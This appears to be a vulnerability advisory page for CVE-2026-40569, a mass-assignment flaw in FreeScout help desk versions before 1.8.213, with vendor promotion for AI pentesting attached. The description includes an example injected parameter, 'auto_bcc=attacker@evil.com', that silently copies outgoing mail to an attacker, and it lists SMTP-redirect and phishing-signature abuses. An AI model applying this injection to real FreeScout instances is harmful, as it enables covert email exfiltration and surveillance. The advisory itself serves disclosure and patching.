CVE-2026-40569
Last modified
CVE-2026-40569 is a critical-severity vulnerability rated 9/10 on the CVSS scale. FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoints of FreeScout (`connectionIncomingSave()` at `app/Http/Controllers/MailboxesController.php:468` and `connectionOutgoingSave()` at line 398). EPSS estimates a 0.30% chance of exploitation in the next 30 days.
Description
FreeScout is a free self-hosted help desk and shared mailbox. Versions prior to 1.8.213 have a mass assignment vulnerability in the mailbox connection settings endpoints of FreeScout (`connectionIncomingSave()` at `app/Http/Controllers/MailboxesController.php:468` and `connectionOutgoingSave()` at line 398). Both methods pass `$request->all()` directly to `$mailbox->fill()` without any field allowlisting, allowing an authenticated admin to overwrite any of the 32 fields in the Mailbox model's `$fillable` array -- including security-critical fields that do not belong to the connection settings form, such as `auto_bcc`, `out_server`, `out_password`, `signature`, `auto_reply_enabled`, and `auto_reply_message`. Validation in `connectionIncomingSave()` is entirely commented out, and the validator in `connectionOutgoingSave()` only checks value formats for SMTP fields without stripping extra parameters. An authenticated admin user can exploit this by appending hidden parameters (e.g., `auto_bcc=attacker@evil.com`) to a legitimate connection settings save request. Because the `auto_bcc` field is not displayed on the connection settings form (it only appears on the general mailbox settings page), the injection is invisible to other administrators reviewing connection settings. Once set, every outgoing email from the affected mailbox is silently BCC'd to the attacker via the `SendReplyToCustomer` job. The same mechanism allows redirecting outgoing SMTP through an attacker-controlled server, injecting tracking pixels or phishing links into email signatures, and enabling attacker-crafted auto-replies -- all from a single HTTP request. This is particularly dangerous in multi-admin environments where one admin can silently surveil mailboxes managed by others, and when an admin session is compromised via a separate vulnerability (e.g., XSS), the attacker gains persistent email exfiltration that survives session expiry. Version 1.8.213 fixes the issue.
Metrics
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L
Weakness Enumeration
References
Timeline
- Published
- Last Modified
- Status
- Deferred
Frequently Asked Questions
What is CVE-2026-40569?
How severe is CVE-2026-40569?
How do I fix CVE-2026-40569?
How Strix Helps
- Uncovering a hidden BOLA in Appsmith's snapshot logicStrix autonomously discovered a BOLA/IDOR vulnerability in Appsmith's snapshot deletion path.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2026
- CVE-2026-40563Description: Improper Control of Generation of Code ('Code I…8.1
- CVE-2026-40564Files or Directories Accessible to External Parties, Server-…6.5
- CVE-2026-40565FreeScout is a free self-hosted help desk and shared mailbox…6.1
- CVE-2026-40566FreeScout is a free self-hosted help desk and shared mailbox…4.1
- CVE-2026-40567FreeScout is a free self-hosted help desk and shared mailbox…5.8
- CVE-2026-40568FreeScout is a free self-hosted help desk and shared mailbox…8.5
- CVE-2026-4057The Download Manager plugin for WordPress is vulnerable to u…4.3
- CVE-2026-40570FreeScout is a free self-hosted help desk and shared mailbox…5.7
- CVE-2026-40571NamelessMC is website software for Minecraft servers. In ver…5.3
- CVE-2026-40572NovumOS is a custom 32-bit operating system written in Zig a…9
- CVE-2026-40574OAuth2 Proxy is a reverse proxy that provides authentication…6.8
- CVE-2026-40575OAuth2 Proxy is a reverse proxy that provides authentication…9.1
Are you affected by CVE-2026-40569?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
